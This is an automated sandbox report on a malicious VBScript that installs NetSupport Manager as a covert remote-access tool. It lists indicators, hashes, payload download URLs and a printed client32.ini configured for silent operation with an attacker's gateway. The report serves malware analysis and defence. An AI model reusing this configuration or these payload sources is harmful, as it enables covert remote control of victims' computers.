                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-multibyte-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-private-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dll4%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe12%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\concrt140.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\libcrypto-1_1.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\libssl-1_1.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100u.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc140u.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp100.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp140.dll4%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcr100.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys4%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sys2%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmexec.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sys0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\nssres.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sys0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\remcmdstub.exe8%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\shfolder.dll3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exe3%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\ucrtbase.dll0%ReversingLabs
                                C:\Program Files (x86)\NetSupport\NetSupport Manager\vccorlib140.dll0%ReversingLabs
                                No Antivirus matches
                                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geo.netsupportsoftware.com | 104.26.0.231 | true | false | - | high
okolinabeauty.com | 176.126.113.166 | true | true | - | unknown
megaeth1337.duckdns.org | 185.170.144.66 | true | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://geo.netsupportsoftware.com/location/loca.asp | false | - | high
https://okolinabeauty.com/choh/Client32.ini | true | Avira URL Cloud: safe | unknown
https://okolinabeauty.com/choh/NSM.lic | true | Avira URL Cloud: safe | unknown
https://okolinabeauty.com/choh/vrep.msi | true | Avira URL Cloud: safe | unknown
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.netsupportsoftware.com/supportmsiexec.exe, 00000015.00000003.2484064535.000000000309F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000015.00000003.2485726143.000000000308C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.symauth.com/cps0(wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drfalse
                                                                                                          high
                                                                                                          https://github.com/Pester/PesterPyyidau.vbs.exe, 00000003.00000002.1825322765.00000000048F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://localhost/ApprovedWebList.htmPrintSurveyInternet6pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://geo.netsupportsoftware.com/location/loca.aspLatLongcloseclient32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.drfalse
                                                                                                              high
                                                                                                              ftp://http://HTTP/1.0client32.exe, 00000026.00000002.2713338524.0000000069A41000.00000020.00000001.01000000.00000025.sdmp, client32.exe, 00000028.00000002.2766685456.000000006B361000.00000020.00000001.01000000.00000025.sdmpfalse
                                                                                                                high
                                                                                                                http://www.symauth.com/rpa00wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drfalse
                                                                                                                  high
                                                                                                                  https://stackoverflow.com/q/2152978/23354Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.netsupportsoftware.commmsiexec.exe, 00000015.00000003.2485822412.0000000003086000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://okolinabeauty.com/Pyyidau.vbs.exe, 00000003.00000002.1882351312.000000000B95F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
176.126.113.166 | okolinabeauty.com | Ukraine | 9063 | SAARGATE-ASVSENETGmbHDE | true
185.170.144.66 | megaeth1337.duckdns.org | unknown | 59753 | VDWELLEREE | true
104.26.0.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1561295
                                                                                                                    Start date and time:2024-11-23 02:36:07 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 13m 0s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:46
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:1
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:Pyyidau.vbs
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.bank.troj.expl.evad.winVBS@72/246@3/3
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 66.7%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 97%
                                                                                                                    • Number of executed functions: 101
                                                                                                                    • Number of non-executed functions: 326
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .vbs
                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Execution Graph export aborted for target Pyyidau.vbs.exe, PID 2916 because it is empty
                                                                                                                    • Execution Graph export aborted for target msiexec.exe, PID 6332 because there are no executed function
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
20:37:05 | API Interceptor | 42x Sleep call for process: Pyyidau.vbs.exe modified
20:38:25 | API Interceptor | 1x Sleep call for process: msiexec.exe modified
                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    • 172.67.162.84
                                                                                                                    https://stewartforeverfarm.com/stewartforeverfarm.shtml%C2%A0Get hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 1.1.1.1
                                                                                                                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                    • 104.21.33.116
                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                    • 172.64.41.3
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza StealerBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    exe010.exeGet hashmaliciousUpatreBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    file.exeGet hashmaliciousAmadey, XWormBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    S0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    Updated Invoice_0755404645-2024_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    • 176.126.113.166
                                                                                                                    No context
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):42744
                                                                                                                    Entropy (8bit):5.779639077996684
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:XqjRjFBBtktktktktktktjoQeBG2LshKsFmua:KjFAQl2IrXa
                                                                                                                    MD5:01D42FABC042B5D7F74ACD63DBBAA598
                                                                                                                    SHA1:0DEB8DBC9DB2F9B8864331EB05501711155BBC63
                                                                                                                    SHA-256:82BD8812241E95AC077A502D0E1AD64BDE1E136F7CC640DD0A23C164E55053AD
                                                                                                                    SHA-512:F4625AD8AF024A8908A2D3795AB84747C3A270C05A5F2ABBEBF1B2A1281D98DAC219CF7318A6FD729C21B8246C7F12EA90A53A58A4B0AE864AA2F28652E4FD07
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Config.Msi\3b1427.rbs, Author: Joe Security
                                                                                                                    Preview:...@IXOS.@.....@.vY.@.....@.....@.....@.....@.....@......&.{CBB68368-7767-4CFF-B3E5-211488346702}..NetSupport Manager..vrep.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{8FA17BDF-C6BA-4483-AA65-62957D834D73}.....@.....@.....@.....@.......@.....@.....@.......@......NetSupport Manager......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopDrivers....CloseGatewayTrayIcon....CloseGatewayApp....ProcessComponents..Updating component registration..&.{68985C0A-F4D4-4570-AE52-E556EED30C8C}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{CBD15933-2EDA-4A68-B11B-B3A1E0540ABB}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{0C0D3B0B-63FD-42B8-9FCE-56A33E5FE94C}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{D69F2005-3C0D-4683-90A1-EC4B5AD43C4B}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{783CBD0A-FEA7-407C-B450-1E275B3563DB}&.{CBB68368-7767-4CFF-B3E5-211488346702}.@......&.{6AB92F9D-58CE-4729-BE0F-FF3C1181ADC5}&.{CBB68368-7767-4CFF-B3
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):82400
                                                                                                                    Entropy (8bit):6.714981336409031
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:a6Y+3bZm8/vLk957pyPkD/bFRFpmPcW+gee/AjHG6ee/gjHB:a6Y+rQ8/Tk9Rp5zFpmPl+gepjm6eljh
                                                                                                                    MD5:F60CE9D311CEE59250BAFAC6E6F1593A
                                                                                                                    SHA1:4838E4FD7F855BA75C55D9D1AD56A87347E91ABA
                                                                                                                    SHA-256:5029A368137EF90609E81A7F691743C1804A5DBFC40AE65540DB4831FD2A2087
                                                                                                                    SHA-512:E4FDD1D011BAA90DBF17CB3BB0C02BF82B450ED153D45E511BEA03427607B51AFCF201E9EBC18E567D9F5F17531AABB1A70A4E594CE0D1AAEC5AD3D41C6CEF8E
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):833
                                                                                                                    Entropy (8bit):5.511102445378548
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:+BhzEPmPT8FVXR8piBlnxOoK1fXXfDH2ijr6cgEW3ZxA2U6L:+BtuK+VXypGlnxJK1fHfXj+cg3ZD
                                                                                                                    MD5:1F0F5E39677EEDA38AADC289DEBCC482
                                                                                                                    SHA1:57E5EA3A82BC22791D1B0317514EF179E8169FB7
                                                                                                                    SHA-256:7A8D6223702D4049C4106867A5D53370977F5CC59E48964CCB5C48EBB2CAA630
                                                                                                                    SHA-512:20BCA25C4405F8627F20AD14A692CED65F1B293B77C995F7969784A38F8CCA518F40117CF3907D7282019BA4C54531314361C2312466685BAB90709B4AAE234E
                                                                                                                    Malicious:false
Preview:
    0x2634664d

    [Client]
    _present=1
    DisableChat=1
    DisableChatMenu=1
    DisableClientConnect=1
    DisableCloseApps=0
    DisableDisconnect=1
    DisableLocalInventory=1
    DisableManageServices=0
    DisableMessage=1
    DisableReplayMenu=1
    DisableRequestHelp=1
    IgnoreBroadcastMsg=1
    Protocols=2,3
    RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA
    RoomSpec=Eval
    ShowUIOnConnect=0
    silent=1
    SKMode=1
    SysTray=0
    UnloadMirrorOnDisconnect=1
    Usernames=CHPOK/1895053373

    [_Info]
    Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini

    [_License]
    quiet=1

    [Audio]
    DisableAudioFilter=1

    [General]
    BeepUsingSpeaker=0
    Password=dgAAAG33wgESVHuw(gLo2JUzbBoA

    [HTTP]
    GatewayAddress=megaeth1337.duckdns.org:1773
    gskmode=0
    GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ
    GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ
    Port=1773

    [View]
    LimitColorbits=7
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):25
                                                                                                                    Entropy (8bit):4.243856189774724
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:tekKKv0ov:JR8y
                                                                                                                    MD5:C05C19B006D57DD4C90785CBE5C7877B
                                                                                                                    SHA1:34BEEBB832E53E4A3B9B3349919689FDF1401151
                                                                                                                    SHA-256:00E0C629D5645C15DF66ADCF99E8A0A3E517D7A7876141AE7A752F0585EEC047
                                                                                                                    SHA-512:BEDE1E24476A12E9B1F29962254B19B357BFDFBE5C6EEC9A2FCA6C1B2105F4CEC1D5872F6BE269EF39D6E5CC542DC587EA9555EF87687BAC64B3FF0DE16C0F8C
                                                                                                                    Malicious:false
                                                                                                                    Preview:[Client]..RoomSpec=Eval..
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):104928
                                                                                                                    Entropy (8bit):6.462496520992136
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:Pm0oPFxNrTUEtzjHlBs/Z5GQFvSeGjreejq:loxrTUEtFBsPGIaemeN
                                                                                                                    MD5:0488F2B6A068F6FAD881A45E427068A2
                                                                                                                    SHA1:B1E6B587D1F1A18C3E8F324C06BDE36608DF11A2
                                                                                                                    SHA-256:E4227BED56D1EA54FE8D4A0D60F68C1B805433F5A083C889F1EBE61D5901654E
                                                                                                                    SHA-512:56A2615AA3BF101430830C6832E494B2448CF8BCE1DA850AC0A9F6D55304508851590D360666B8926369E1FA925514F544BD5BA24E02192113018B6869079499
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\Client32Provider.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):3926
                                                                                                                    Entropy (8bit):5.282899777821006
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:IQIT9RO30TdADA/kAqJNdzzpd47J69Tb1UgzP5DrwBt2U7xwZViSdMD+cGrr1AP2:qTKcMAkLvX47JE1UgzJUtDiO+Lrr1As9
                                                                                                                    MD5:4D9E1C4B8A78F4C8D6CE5235D42C8F1E
                                                                                                                    SHA1:6BD13DC34A053F0F40A0D77241AA4BD1EB4DFC42
                                                                                                                    SHA-256:6D098726CBCDB392BC3A43D4D218072F5CADD4B82D83ADA87BCE65F7642AF602
                                                                                                                    SHA-512:52953FC6A3474A682436C17AD8308C83514AA20CFFD1844E78426EA809FAFC1F2A2FEDDB09BC7F4D12996728D5017C816CF58AFE3B7CE6B79DC2557BAD7564DE
                                                                                                                    Malicious:false
                                                                                                                    Preview:; Keyboard layout file for NetSupport Control..;..; Format of this file is:..; keyboard layout name..; special key mappings..; repeated as often as desired..;..; Special key mappings take the form:..; scancode=character scancode=character .....; where scancode is a hexadecimal number..; (if >= 80 hex, the SHIFTED key is mapped)..; (if >= 100 hex, the ALT Gr key is mapped)....Unmapped Keyboard..FE=x..UK enhanced (102 key) keyboard..83=" 84=. A8=@ 29=` A9=. 2B=# AB=~ 56=\ D6=|....US enhanced (102 key) keyboard..83=@ 84=# A8=" 29=` A9=~ 2B=\ AB=| 56=\ D6=|....German enhanced (102 key) keyboard..29=^ a9=. 103=. 84=. 104=. 88=/ 108={ 89=( 109=[ 8a=) 10a=] 8b== 10b=} 0c=. 8c=? 10c=\ 0d=. 8d=` 110=@ 112=. 15=z 95=Z 1a=. 9a=. 1b=+ 9b=* 11b=~ 27=. a7=. 28=. a8=. ab=' 56=< d6=> 156=| 2c=y ac=Y 132=. b3=; b4=: 35=- b5=_ ....French enhanced (102 key) keyboard..29=. 02=& 82=1 03=. 83=2 103=~ 04=" 84=3 104=# 05=' 85=4 105={ 06=( 86=5 106=[ 07=- 87=6 107=| 08=. 88=7 108=` 09=_ 89=8 109=\ 0A
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):186336
                                                                                                                    Entropy (8bit):7.03311119010921
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:ClXC3/npbt1b5Ooum6yWCmNc4OYZ/Y+ZhJbe8Djbeij6:aXC35t1UOi7Os3le8LeZ
                                                                                                                    MD5:3B6E06D0861D2D553111BBCB1783BCAD
                                                                                                                    SHA1:18B3AA65FCC2C4E067A3DC097E833BA5CC82EB40
                                                                                                                    SHA-256:5B4A2536FCC852D811A351BEF1583F7D5DB516D66474F86EB3766D7EA7AE4749
                                                                                                                    SHA-512:D80D2F7212A30DA7B625DAEADD64B07543059DDC1E016D650AB3E50A16C8F4BE4194F178D8CED65F6C4857A74C10DA6501E1958A94BEF0AE4529F6134ABBDD03
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\CryptPak.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):89568
                                                                                                                    Entropy (8bit):6.7180392406274745
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:l1rRVUJVO9WjSe8wkrau39b35akGnHf3nVv5Hjwi9RGeSee/OjHAee/+jHri:7w8r76fZ5Hjwi9R3Se3jgeXje
                                                                                                                    MD5:5720EBD42711018DA15E56216B4B9E11
                                                                                                                    SHA1:DEC04A1C9CAC50CC2EDEABC8B628EFA615A65D45
                                                                                                                    SHA-256:4F757A99F8DBB4BC31187140AD048F149CA61A1127923E6F08F6E77EDA8E97F8
                                                                                                                    SHA-512:D4FB17B218CB82AED5601578F94DF35D3C1A1690D402FCA978281CF6649CCF69C4487F151BE4C0ED2DB2EED716761B5B6CE27393B1A3F5ADAB28F99FA906A72A
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):117728
                                                                                                                    Entropy (8bit):6.195705433401619
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:ONMIm6T+oOVZ5gJhPci0sWjcdpqD+MilESrH8q5Ree/BjHWee/TjHw:ONXm6FAOV7pqD+DESrH8q5Regj2eGjQ
                                                                                                                    MD5:F574F3A16C358D73C5F8A17606E75EBF
                                                                                                                    SHA1:00D6002C8B2C4C6D9F8BEF02E169777E4B517CF5
                                                                                                                    SHA-256:7EC3DA30E73122F5B050D503CB2214537E90016EEC059F852230B4F1B87E1B08
                                                                                                                    SHA-512:1D1664DBAA8E4F086523D9D63B69E15BFF7B8C9CF047C1C964E40DA308957355F6CED2F19D0D57B3D4EE72250E653DA75196F804230C4CCC146ADB0984FEA035
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\DeskDup.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):616928
                                                                                                                    Entropy (8bit):6.723244642108574
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:cVqKnPyKX/gu8Vk3AZkUBEX9gGXiaxHwTcpqPqlu20n9h0hds0/qnrY9vkoBLEla:/cyysqFUY9vkCEswvUKZjI/8ZEjv3Lt
                                                                                                                    MD5:C666FD00B08757335E2F30CA0D6F63C2
                                                                                                                    SHA1:996891107C4F32A0062C6FA8C1741A8CD5C659EF
                                                                                                                    SHA-256:F61ACF95B9B9CBA2AAC856783CF1F2F486548F96CF21118161E40A08C9101E58
                                                                                                                    SHA-512:33B8D6893C4E370782AA922E1437BF1502D127059F86CA30DAEA3145B99B3459B7D6A1C3471608867CE91D873C1F0B376B550E5AC57BCB36732154C65124E2BA
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\HTCTL32.DLL, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):240096
                                                                                                                    Entropy (8bit):6.812972915579879
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:AZq8EqxQhS2QfOayU+cO30JHR8jZ4JmBPgyxOJoFiAyFUkplRAYeYjmeejj/:ZaxsmOTWujygwAyFUG1eleg/
                                                                                                                    MD5:EE02606C9E853533E2FF414E4640571B
                                                                                                                    SHA1:19C847251AADF8BA5A39CC090EEF8E6D7534C423
                                                                                                                    SHA-256:8545B1AF2255629A4EEA1B43E3D1794CDB9ED2E51B576F09E1C0C18023B7BCF3
                                                                                                                    SHA-512:984198538D4FD358E3910F2FA8D0BD6EE6D9488719B456D62D604B6B173F61B6201DFF94DE3722890A99CCADA30F95F009C433010381FB823FB2B16792EF157A
                                                                                                                    Malicious:false
